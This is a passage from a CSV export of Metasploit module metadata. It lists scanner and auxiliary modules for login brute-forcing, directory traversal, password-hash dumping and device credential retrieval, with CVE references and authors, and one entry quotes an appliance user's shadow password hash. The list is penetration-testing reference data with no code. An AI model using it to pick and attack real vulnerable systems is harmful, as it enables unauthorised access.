Oliveira " 1549,"2013-05-30 14:36:26","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/tomcat_mgr_login.rb","auxiliary","scanner/http/tomcat_mgr_login","auxiliary/scanner/http/tomcat_mgr_login","Tomcat Application Manager Login Utility",300,"This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-36954, BID-37086, BID-38084, CVE-1999-0502, CVE-2009-3548, CVE-2009-3843, CVE-2009-4188, CVE-2009-4189, CVE-2010-0557, CVE-2010-4094, OSVDB-60176, OSVDB-60317, OSVDB-60670, URL-http://tomcat.apache.org/, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179, URL-http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-085/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-214/","MC , Matteo Cantoni , jduck " 1550,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb","auxiliary","scanner/http/tplink_traversal_noauth","auxiliary/scanner/http/tplink_traversal_noauth","TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability",300,"This module tests whether a directory traversal vulnerability is present in versions of TP-Link Access Point 3.12.16 Build 120228 Rel.37317n.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-57969, CVE-2012-5687, EDB-24504, OSVDB-86881, URL-http://www.s3cur1ty.de/m1adv2013-011, URL-http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1","Michael Messner " 1551,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/trace.rb","auxiliary","scanner/http/trace","auxiliary/scanner/http/trace","HTTP TRACE Detection",300,"Test if TRACE is actually enabled. 405 (Apache) 501(IIS) if its disabled, 200 if it is","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"CG " 1552,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/trace_axd.rb","auxiliary","scanner/http/trace_axd","auxiliary/scanner/http/trace_axd","HTTP trace.axd Content Scanner",300,"Detect trace.axd files and analize its content","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"c4an" 1553,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vcms_login.rb","auxiliary","scanner/http/vcms_login","auxiliary/scanner/http/vcms_login","V-CMS Login Utility",300,"This module attempts to authenticate to an English-based V-CMS login interface. It should only work against version v1.1 or older, because these versions do not have any default protections against bruteforcing.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"sinn3r " 1554,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/verb_auth_bypass.rb","auxiliary","scanner/http/verb_auth_bypass","auxiliary/scanner/http/verb_auth_bypass","HTTP Verb Authentication Bypass Scanner",300,"This module test for authentication bypass using different HTTP verbs.","BSD License","f",,,,"aggressive","t",,"et " 1555,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vhost_scanner.rb","auxiliary","scanner/http/vhost_scanner","auxiliary/scanner/http/vhost_scanner","HTTP Virtual Host Brute Force Scanner",300,"This module tries to identify unique virtual hosts hosted by the target web server.","BSD License","f",,,,"aggressive","t",,"et " 1556,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb","auxiliary","scanner/http/vmware_server_dir_trav","auxiliary/scanner/http/vmware_server_dir_trav","VMware Server Directory Traversal Vulnerability",300,"This modules exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files. Common VMware server ports 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out the gueststealer tool.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-36842, CVE-2009-3733, OSVDB-59440, URL-http://fyrmassociates.com/tools/gueststealer-v1.1.pl, URL-http://www.vmware.com/security/advisories/VMSA-2009-0015.html","CG " 1557,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb","auxiliary","scanner/http/vmware_update_manager_traversal","auxiliary/scanner/http/vmware_update_manager_traversal","VMWare Update Manager 4 Directory Traversal",300,"This modules exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4.","Metasploit Framework License (BSD)","f","2011-11-21 00:00:00",,,"aggressive","t","CVE-2011-4404, EDB-18138, URL-http://dsecrg.com/pages/vul/show.php?id=342, URL-http://www.vmware.com/security/advisories/VMSA-2011-0014.html","Alexey Sintsov, sinn3r " 1558,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/wangkongbao_traversal.rb","auxiliary","scanner/http/wangkongbao_traversal","auxiliary/scanner/http/wangkongbao_traversal","WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal",300,"This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka Network Security Platform. This directory traversal vulnerability is interesting because the apache server is running as root, this means we can grab anything we want! For instance, the /etc/shadow and /etc/passwd files for the special kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user","Metasploit Framework License (BSD)","f",,,,"aggressive","t","EDB-19526","Dillon Beresford" 1559,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/web_vulndb.rb","auxiliary","scanner/http/web_vulndb","auxiliary/scanner/http/web_vulndb","HTTP Vuln Scanner",300,"This module identifies common vulnerable files or cgis.","BSD License","f",,,,"aggressive","t",,"et " 1560,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webdav_internal_ip.rb","auxiliary","scanner/http/webdav_internal_ip","auxiliary/scanner/http/webdav_internal_ip","HTTP WebDAV Internal IP Scanner",300,"Detect webservers internal IPs though WebDAV","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1561,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webdav_scanner.rb","auxiliary","scanner/http/webdav_scanner","auxiliary/scanner/http/webdav_scanner","HTTP WebDAV Scanner",300,"Detect webservers with WebDAV enabled","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1562,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webdav_website_content.rb","auxiliary","scanner/http/webdav_website_content","auxiliary/scanner/http/webdav_website_content","HTTP WebDAV Website Content Scanner",300,"Detect webservers disclosing its content though WebDAV","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et " 1563,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/webpagetest_traversal.rb","auxiliary","scanner/http/webpagetest_traversal","auxiliary/scanner/http/webpagetest_traversal","WebPageTest Directory Traversal",300,"This module exploits a directory traversal vulnerability found in WebPageTest. Due to the way the gettext.php script handles the 'file' parameter, it is possible to read a file outside the www directory.","Metasploit Framework License (BSD)","f","2012-07-13 00:00:00",,,"aggressive","t","EDB-19790, OSVDB-83817","dun, sinn3r " 1564,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/wordpress_login_enum.rb","auxiliary","scanner/http/wordpress_login_enum","auxiliary/scanner/http/wordpress_login_enum","Wordpress Brute Force and User Enumeration Utility",300,"Wordpress Authentication Brute Force and User Enumeration Utility","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-35581, CVE-2009-2335, OSVDB-55713","Alligator Security Team, Tiago Ferreira , Zach Grace " 1565,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/wordpress_pingback_access.rb","auxiliary","scanner/http/wordpress_pingback_access","auxiliary/scanner/http/wordpress_pingback_access","Wordpress Pingback Locator",300,"This module will scan for wordpress sites with the Pingback API enabled. By interfacing with the API an attacker can cause the wordpress site to port scan an external target and return results. Refer to the wordpress_pingback_portscanner module. This issue was fixed in wordpress 3.5.1","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/, URL-http://www.securityfocus.com/archive/1/525045/30/30/threaded, URL-https://github.com/FireFart/WordpressPingbackPortScanner","Brandon McCann ""zeknox"" , Christian Mehlmauer ""FireFart"" , Thomas McCarthy ""smilingraccoon"" " 1566,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/xpath.rb","auxiliary","scanner/http/xpath","auxiliary/scanner/http/xpath","HTTP Blind XPATH 1.0 Injector",300,"This module exploits blind XPATH 1.0 injections over HTTP GET requests.","BSD License","f",,,,"aggressive","t",,"et " 1567,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/yaws_traversal.rb","auxiliary","scanner/http/yaws_traversal","auxiliary/scanner/http/yaws_traversal","Yaws Web Server Directory Traversal",300,"This module exploits a directory traversal bug in Yaws v1.9.1 or less. The module can only be used to retrieve files. However, code execution might be possible. Because when the malicious user sends a PUT request, a file is actually created, except no content is written.","Metasploit Framework License (BSD)","f","2011-11-25 00:00:00",,,"aggressive","t","CVE-2011-4350, OSVDB-77581, URL-https://bugzilla.redhat.com/show_bug.cgi?id=757181","sinn3r " 1568,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb","auxiliary","scanner/http/zenworks_assetmanagement_fileaccess","auxiliary/scanner/http/zenworks_assetmanagement_fileaccess","Novell ZENworks Asset Management 7.5 Remote File Access",300,"This module exploits a hardcoded user and password for the GetFile maintenance task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of remote files. This module has been successfully tested on Novell ZENworks Asset Management 7.5.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-4933, URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks","juan vazquez " 1569,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb","auxiliary","scanner/http/zenworks_assetmanagement_getconfig","auxiliary/scanner/http/zenworks_assetmanagement_getconfig","Novell ZENworks Asset Management 7.5 Configuration Access",300,"This module exploits a hardcoded user and password for the GetConfig maintenance task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve the configuration parameters of Nozvell Zenworks Asset Managmment, including the database credentials in clear text. This module has been successfully tested on Novell ZENworks Asset Management 7.5.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-4933, URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks","juan vazquez " 1570,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/imap/imap_version.rb","auxiliary","scanner/imap/imap_version","auxiliary/scanner/imap/imap_version","IMAP4 Banner Grabber",300,"IMAP4 Banner Grabber","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1571,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ip/ipidseq.rb","auxiliary","scanner/ip/ipidseq","auxiliary/scanner/ip/ipidseq","IPID Sequence Scanner",300,"This module will probe hosts' IPID sequences and classify them using the same method Nmap uses when it's performing its IPID Idle Scan (-sI) and OS Detection (-O). Nmap's probes are SYN/ACKs while this module's are SYNs. While this does not change the underlying functionality, it does change the chance of whether or not the probe will be stopped by a firewall. Nmap's Idle Scan can use hosts whose IPID sequences are classified as ""Incremental"" or ""Broken little-endian incremental"".","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1572,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb","auxiliary","scanner/lotus/lotus_domino_hashes","auxiliary/scanner/lotus/lotus_domino_hashes","Lotus Domino Password Hash Collector",300,"Get users passwords hashes from names.nsf page","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Tiago Ferreira " 1573,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/lotus/lotus_domino_login.rb","auxiliary","scanner/lotus/lotus_domino_login","auxiliary/scanner/lotus/lotus_domino_login","Lotus Domino Brute Force Utility",300,"Lotus Domino Authentication Brute Force Utility","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Tiago Ferreira " 1574,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/lotus/lotus_domino_version.rb","auxiliary","scanner/lotus/lotus_domino_version","auxiliary/scanner/lotus/lotus_domino_version","Lotus Domino Version",300,"Several checks to determine Lotus Domino Server Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"CG " 1575,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/cctv_dvr_login.rb","auxiliary","scanner/misc/cctv_dvr_login","auxiliary/scanner/misc/cctv_dvr_login","CCTV DVR Login Scanning Utility",300,"This module tests for standalone CCTV DVR video surveillance deployments specifically by MicroDigital, HIVISION, CTRing, and numerous other rebranded devices that are utilizing default vendor passwords. Additionally, this module has the ability to brute force user accounts. Such CCTV DVR video surveillance deployments support remote viewing through Central Management Software (CMS) via the CMS Web Client, an IE ActiveX control hosted over HTTP, or through Win32 or mobile CMS client software. By default, remote authentication is handled over port 5920/TCP with video streaming over 5921/TCP. After successful authentication over 5920/TCP this module will then attempt to determine if the IE ActiveX control is listening on the default HTTP port (80/TCP).","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Justin Cacak" 1576,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb","auxiliary","scanner/misc/dvr_config_disclosure","auxiliary/scanner/misc/dvr_config_disclosure","Multiple DVR Manufacturers Configuration Disclosure",300,"This module takes advantage of an authentication bypass vulnerability at the web interface of multiple manufacturers DVR systems, which allows to retrieve the device configuration.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2013-1391, URL-http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html","Alejandro Ramos, juan vazquez " 1577,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb","auxiliary","scanner/misc/ib_service_mgr_info","auxiliary/scanner/misc/ib_service_mgr_info","Borland InterBase Services Manager Information",300,"This module retrieves version of the services manager, version and implementation of the InterBase server from InterBase Services Manager.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Adriano Lima , Ramon de C Valle " 1578,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/java_rmi_server.rb","auxiliary","scanner/misc/java_rmi_server","auxiliary/scanner/misc/java_rmi_server","Java RMI Server Insecure Endpoint Code Execution Scanner",300,"Detect Java RMI endpoints","Metasploit Framework License (BSD)","f","2011-10-15 00:00:00",,,"aggressive","t","MSF-java_rmi_server, URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html","hdm , mihi" 1579,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/oki_scanner.rb","auxiliary","scanner/misc/oki_scanner","auxiliary/scanner/misc/oki_scanner","OKI Printer Default Login Credential Scanner",300,"This module scans for OKI printers via SNMP, then tries to connect to found devices with vendor default administrator credentials via HTTP authentication. By default, OKI network printers use the last six digits of the MAC as admin password.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"antr6X " 1580,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb","auxiliary","scanner/misc/raysharp_dvr_passwords","auxiliary/scanner/misc/raysharp_dvr_passwords","Ray Sharp DVR Password Retriever",300,"This module takes advantage of a protocol design issue with the Ray Sharp based DVR systems. It is possible to retrieve the username and password through the TCP service running on port 9000. Other brands using this platform and exposing the same issue may include Swann, Lorex, Night Owl, Zmodo, URMET, and KGuard Security.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html","hdm , someluser" 1581,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/redis_server.rb","auxiliary","scanner/misc/redis_server","auxiliary/scanner/misc/redis_server","Redis-server Scanner",300,"This module scans for Redis server. By default Redis has no auth. If auth (password only) is used, it is then possible to execute a brute force attack on the server. This scanner will find open or password protected Redis servers and report back the server information","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"iallison " 1582,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb","auxiliary","scanner/misc/rosewill_rxs3211_passwords","auxiliary/scanner/misc/rosewill_rxs3211_passwords","Rosewill RXS-3211 IP Camera Password Retriever",300,"This module takes advantage of a protocol design issue with the Rosewill admin executable in order to retrieve passwords, allowing remote attackers to take administrative control over the device. Other similar IP Cameras such as Edimax, Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested. The protocol deisgn issue also allows attackers to reset passwords on the device.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/","Ben Schmidt" 1583,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb","auxiliary","scanner/misc/sunrpc_portmapper","auxiliary/scanner/misc/sunrpc_portmapper","SunRPC Portmap Program Enumerator",300,"This module calls the target portmap service and enumerates all program entries and their running port numbers.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.ietf.org/rfc/rfc1057.txt","tebo " 1584,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb","auxiliary","scanner/misc/zenworks_preboot_fileaccess","auxiliary/scanner/misc/zenworks_preboot_fileaccess","Novell ZENworks Configuration Management Preboot Service Remote File Access",300,"This module exploits a directory traversal in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2012-2215, OSVDB-80230, URL-http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975","Luigi Auriemma, juan vazquez " 1585,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mongodb/mongodb_login.rb","auxiliary","scanner/mongodb/mongodb_login","auxiliary/scanner/mongodb/mongodb_login","MongoDB Login Utility",300,"This module attempts to brute force authentication credentials for MongoDB. Note that, by default, MongoDB does not require authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.mongodb.org/display/DOCS/Implementing+Authentication+in+a+Driver, URL-http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol","Gregory Man " 1586,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/motorola/timbuktu_udp.rb","auxiliary","scanner/motorola/timbuktu_udp","auxiliary/scanner/motorola/timbuktu_udp","Motorola Timbuktu Service Detection",300,"This module simply sends a packet to the Motorola Timbuktu service for detection.","Metasploit Framework License (BSD)","f","2009-09-25 00:00:00",,,"aggressive","t",,"MC " 1587,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/msf/msf_rpc_login.rb","auxiliary","scanner/msf/msf_rpc_login","auxiliary/scanner/msf/msf_rpc_login","Metasploit RPC Interface Login Utility",300,"This module simply attempts to login to a Metasploit RPC interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1588,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/msf/msf_web_login.rb","auxiliary","scanner/msf/msf_web_login","auxiliary/scanner/msf/msf_web_login","Metasploit Web interface Login Utility",300,"This module simply attempts to login to a Metasploit web interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1589,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_hashdump.rb","auxiliary","scanner/mssql/mssql_hashdump","auxiliary/scanner/mssql/mssql_hashdump","MSSQL Password Hashdump",300,"This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1590,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_login.rb","auxiliary","scanner/mssql/mssql_login","auxiliary/scanner/mssql/mssql_login","MSSQL Login Utility",300,"This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0506","MC " 1591,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_ping.rb","auxiliary","scanner/mssql/mssql_ping","auxiliary/scanner/mssql/mssql_ping","MSSQL Ping Utility",300,"This module simply queries the MSSQL instance for information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1592,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mssql/mssql_schemadump.rb","auxiliary","scanner/mssql/mssql_schemadump","auxiliary/scanner/mssql/mssql_schemadump","MSSQL Schema Dump",300,"This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master,model,msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1593,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb","auxiliary","scanner/mysql/mysql_authbypass_hashdump","auxiliary/scanner/mysql/mysql_authbypass_hashdump","MySQL Authentication Bypass Password Dump",300,"This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes ares stored as loot for later cracking.","Metasploit Framework License (BSD)","f","2012-06-09 00:00:00",,,"aggressive","t","CVE-2012-2122, OSVDB-82804, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql","jcran , theLightCosine " 1594,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_file_enum.rb","auxiliary","scanner/mysql/mysql_file_enum","auxiliary/scanner/mysql/mysql_file_enum","MYSQL File/Directory Enumerator",300,"Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html, URL-http://www.digininja.org/projects/mysql_file_enum.php","Robin Wood " 1595,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_hashdump.rb","auxiliary","scanner/mysql/mysql_hashdump","auxiliary/scanner/mysql/mysql_hashdump","MYSQL Password Hashdump",300,"This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1596,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_login.rb","auxiliary","scanner/mysql/mysql_login","auxiliary/scanner/mysql/mysql_login","MySQL Login Utility",300,"This module simply queries the MySQL instance for a specific user/pass (default is root with blank).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Bernardo Damele A. G. " 1597,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_schemadump.rb","auxiliary","scanner/mysql/mysql_schemadump","auxiliary/scanner/mysql/mysql_schemadump","MYSQL Schema Dump",300,"This module extracts the schema information from a MySQL DB server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1598,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/mysql/mysql_version.rb","auxiliary","scanner/mysql/mysql_version","auxiliary/scanner/mysql/mysql_version","MySQL Server Version Enumeration",300,"Enumerates the version of MySQL servers","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"kris katterjohn " 1599,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb","auxiliary","scanner/natpmp/natpmp_portscan","auxiliary/scanner/natpmp/natpmp_portscan","NAT-PMP External Port Scanner",300,"Scan NAT devices for their external listening ports using NAT-PMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Jon Hart " 1600,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb","auxiliary","scanner/nessus/nessus_ntp_login","auxiliary/scanner/nessus/nessus_ntp_login","Nessus NTP Login Utility",300,"This module attempts to authenticate to a Nessus NTP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1601,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb","auxiliary","scanner/nessus/nessus_xmlrpc_login","auxiliary/scanner/nessus/nessus_xmlrpc_login","Nessus XMLRPC Interface Login Utility",300,"This module simply attempts to login to a Nessus XMLRPC interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1602,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb","auxiliary","scanner/nessus/nessus_xmlrpc_ping","auxiliary/scanner/nessus/nessus_xmlrpc_ping","Nessus XMLRPC Interface Ping Utility",300,"This module simply attempts to find and check for Nessus XMLRPC interface.'","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1603,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/netbios/nbname.rb","auxiliary","scanner/netbios/nbname","auxiliary/scanner/netbios/nbname","NetBIOS Information Discovery",300,"Discover host information through NetBIOS","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1604,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/netbios/nbname_probe.rb","auxiliary","scanner/netbios/nbname_probe","auxiliary/scanner/netbios/nbname_probe","NetBIOS Information Discovery Prober",300,"Discover host information using sequential NetBIOS Probes","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , todb " 1605,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb","auxiliary","scanner/nexpose/nexpose_api_login","auxiliary/scanner/nexpose/nexpose_api_login","NeXpose API Interface Login Utility",300,"This module simply attempts to login to a NeXpose API interface using a specific user/pass.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Vlatko Kosturjak " 1606,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/nfs/nfsmount.rb","auxiliary","scanner/nfs/nfsmount","auxiliary/scanner/nfs/nfsmount","NFS Mount Scanner",300,"This module scans NFS mounts and their permissions.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0170, URL-http://www.ietf.org/rfc/rfc1094.txt","tebo " 1607,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ntp/ntp_monlist.rb","auxiliary","scanner/ntp/ntp_monlist","auxiliary/scanner/ntp/ntp_monlist","NTP Monitor List Scanner",300,"Obtain the list of recent clients from an NTP server","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1608,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ntp/ntp_readvar.rb","auxiliary","scanner/ntp/ntp_readvar","auxiliary/scanner/ntp/ntp_readvar","NTP Clock Variables Disclosure",300,"This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure","Ewerson Guimaraes(Crash) " 1609,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb","auxiliary","scanner/openvas/openvas_gsad_login","auxiliary/scanner/openvas/openvas_gsad_login","OpenVAS gsad Web interface Login Utility",300,"This module simply attempts to login to a 